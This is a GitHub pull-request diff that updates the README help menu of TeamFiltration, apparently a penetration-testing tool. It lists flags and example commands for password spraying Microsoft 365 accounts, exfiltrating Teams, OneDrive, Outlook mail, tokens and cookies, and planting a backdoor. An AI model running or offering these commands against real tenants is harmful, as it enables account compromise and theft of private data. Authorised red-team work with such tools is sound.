Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Updated help menu #28

Merged
merged 1 commit into from
Apr 11, 2023
Merged

Updated help menu #28

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
102 changes: 56 additions & 46 deletions README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -13,69 +13,77 @@ This tool has been used internally since January 2021 and was publicly released

```

╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ╟╬╬╜╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬ │ ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬ ││ ╙╬╬╜╘ └╙╜╬╬╬╬╬╬
╬╬╬╬ ╓╥╥╬╬╬╬╬╬╥╥╖ ││ │ ╬╬╬╬╬
╬╬╬╬ ╓╬╫╬╜╜╙╜╜╬╫╬┐ ││ ││ └╬╬╬╬
╬╬╬╬┤ ╬╬╜╙╩╬╖╓ ╬╬╬ ││ ││ ╬╬╬╬
╬╬╬╬┤ ╬ ╙╬╫╖╖ ╓ ╙╬╖ ││ ├││ ╬╬╬╬
╬╬╬╬┤ ╬╬ ╓╖ ╬╬╬╬╬╬╦ ╬╬ │┌ ╬┤││ ╬╬╬╬
╬╬╬╬┤ ╬┤ ╬╬╬ ╬╬╬╬╬╬╬╬╜╜╜╬╬╖ ╟╬╬╬╬╬╬╬╬╬ ┌╬╬╬╬╬
╬╬╬╬┤ ╬╬┤ ╩┘ ╬╬╬╬╬╩ ╬╬ ╙╜╜╜╜╜╜╜╜╜╬╬╖╖╖╦╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬┤ ╬╬ ││ ╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬ ╦ ╬╬ ││ │ ╬╬╬╬
╬╬╬╬┤ └╬┐ ╙╬╖╖ ╓╬╬╜ ╬┘ ││ │ ╬╬╬╬
╬╬╬╬┤ └╬ ╙╩╨╬╬╬╩╨╜╜ ╬╬ ││ │ ╬╬╬╬
╬╬╬╬┤ ╬╬╬╖╫╬╜┘ ││ │ ╬╬╬╬
╬╬╬╬┤ ╩╬╬╬╥╥╥╥╥╥╫╬╬╜╜ ││ │ ╬╬╬╬
╬╬╬╬┤ ╙╙╜╜╜╛ ││ │ ╬╬╬╬
╬╬╬╬┤ ││ │ ╓╖╬╬╬╬╬
╬╬╬╬┤ ╠╬╬╝╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬ │ ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬ ││ ╚╬╬╝╚ └╚╝╬╬╬╬╬╬
╬╬╬╬ ╔╦╦╬╬╬╬╬╬╦╦╗ ││ │ ╬╬╬╬╬
╬╬╬╬ ╔╬╬╬╝╝╚╝╝╬╬╬┐ ││ ││ └╬╬╬╬
╬╬╬╬┤ ╬╬╝╚╩╬╗╔ ╬╬╬ ││ ││ ╬╬╬╬
╬╬╬╬┤ ╬ ╚╬╬╗╗ ╔ ╚╬╗ ││ ├││ ╬╬╬╬
╬╬╬╬┤ ╬╬ ╔╗ ╬╬╬╬╬╬╦ ╬╬ │┌ ╬┤││ ╬╬╬╬
╬╬╬╬┤ ╬┤ ╬╬╬ ╬╬╬╬╬╬╬╬╝╝╝╬╬╗ ╠╬╬╬╬╬╬╬╬╬ ┌╬╬╬╬╬
╬╬╬╬┤ ╬╬┤ ╩┘ ╬╬╬╬╬╩ ╬╬ ╚╝╝╝╝╝╝╝╝╝╬╬╗╗╗╦╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬┤ ╬╬ ││ ╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬ ╦ ╬╬ ││ │ ╬╬╬╬
╬╬╬╬┤ └╬┐ ╚╬╗╗ ╔╬╬╝ ╬┘ ││ │ ╬╬╬╬
╬╬╬╬┤ └╬ ╚╩╩╬╬╬╩╩╝╝ ╬╬ ││ │ ╬╬╬╬
╬╬╬╬┤ ╬╬╬╗╬╬╝┘ ││ │ ╬╬╬╬
╬╬╬╬┤ ╩╬╬╬╦╦╦╦╦╦╬╬╬╝╝ ││ │ ╬╬╬╬
╬╬╬╬┤ ╚╚╝╝╝╝ ││ │ ╬╬╬╬
╬╬╬╬┤ ││ │ ╔╗╬╬╬╬╬
╬╬╬╬┤ ││ ╬╦╦╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ││ ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ││ ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬┤ ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
└╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜╜
└╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝

[] TeamFiltration V0.3.3.7 PUBLIC, created by @Flangvik @TrustedSec
[] TeamFiltration V3.5.1 PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed
Usage:

--outpath Output path to store database and exfiltrated information (Needed for all modules)

--config Local path to your TeamFiltration.json configuration file, if not provided will load from the current path

--exfil Load the exfiltration module
--exfil Load the exfiltration module

--username Override to target a given username that does not exist in the database
--password Override to target a given password that does not exist in the database
--cookie-dump Override to target a given account using it's refresk-cookie-collection
--tokens Override to target a (file with newline seperated JWT tokens|single JWT| , seperated JWT tokens) and perfom exfiltration
--cookie-dump Override to target a given account using it's refresh-cookie-collection

--all Exfiltrate information from ALL SSO resources (Graph, OWA, SharePoint, OneDrive, Teams)
--aad Exfiltrate information from Graph API (domain users and groups)
--teams Exfiltrate information from Teams API (files, chatlogs, attachments, contactlist)
--teams-db Exfiltrate cookies and authentication tokens from an exfiltrated Teams database
--onedrive Exfiltrate information from OneDrive/SharePoint API (accessible SharePoint files and the users entire OneDrive directory)
--owa Exfiltrate information from the Outlook REST API (The last 2k emails, both sent and received)
--owa-limit Set the max amount of emails to exfiltrate, default is 2k.
--jwt-tokens Exfiltrate JSON formated JTW-tokens for SSO resources (MsGraph,AdGraph, Outlook, SharePoint, OneDrive, Teams)
--owa-limit Set the max amount of emails to exfiltrate, default is 2k.
--jwt-tokens Dump all gathered JSON formated JTW-tokens for SSO resources (MsGraph,AdGraph, Outlook, SharePoint, OneDrive, Teams)

--spray Load the spraying module

--aad-sso Use SecureWorks recent Azure Active Directory password brute-forcing vuln for spraying
--aad-sso Use SecureWorks's Azure Active Directory password brute-forcing technique when spraying
--us-cloud When spraying companies attached to US Tenants (https://login.microsoftonline.us/)
--time-window Defines a time windows where spraying should accour, in the military time format <12:00-19:00>

--passwords Path to a list of passwords, common weak-passwords will be generated if not supplied
--seasons-only Password generated for spraying will only be based on seasons
--exclude Path to a list of emails to exclude from spraying
--seasons-only Password genersated for spraying will only be based on seasons
--months-only Password generated for spraying will only be based on months
--common-only Spray with the top 20 most common passwords
--combo Path to a combolist of username:password
--exclude Path to a list of emails to exclude from spraying
--shuffle-passwords Shuffle the passwordlist before spraying
--shuffle-users Shuffle the target userlist before spraying
--shuffle-regions Shuffle FireProx regions when spraying

--auto-exfil If valid login is found, auto start the exfil module

--sleep-min Minimum minutes to sleep between each full rotation of spraying default=60
--sleep-max Maximum minutes to sleep between each full rotation of spraying default=100
--delay Delay in seconds between each individual authentication attempt. default=0
--jitter Seconds between each individual authentication attempt. default=0
--time-window Defines a time windows where spraying should accour, in the military time format <12:00-19:00>
--push Get Pushover notifications when valid credentials are found (requires pushover keys in config)
--push-locked Get Pushover notifications when an sprayed account gets locked (requires pushover keys in config)
--force Force the spraying to proceed even if there is less the <sleep> time since the last attempt
Expand All @@ -93,21 +101,23 @@ Usage:

--database Loads the interactive database browser module

--debug Add burp as a proxy on 127.0.0.1:8080
--debug Proxy all outgoing HTTP requests through the proxy specified in the config

Examples:

--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --exfil --all
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --exfil --aad
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --backdoor
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --database
--outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
--outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
--outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
--outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
--outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad
--outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
--outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
--outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
--outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
--outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
--outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor
--outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database

```

## Credits
Expand Down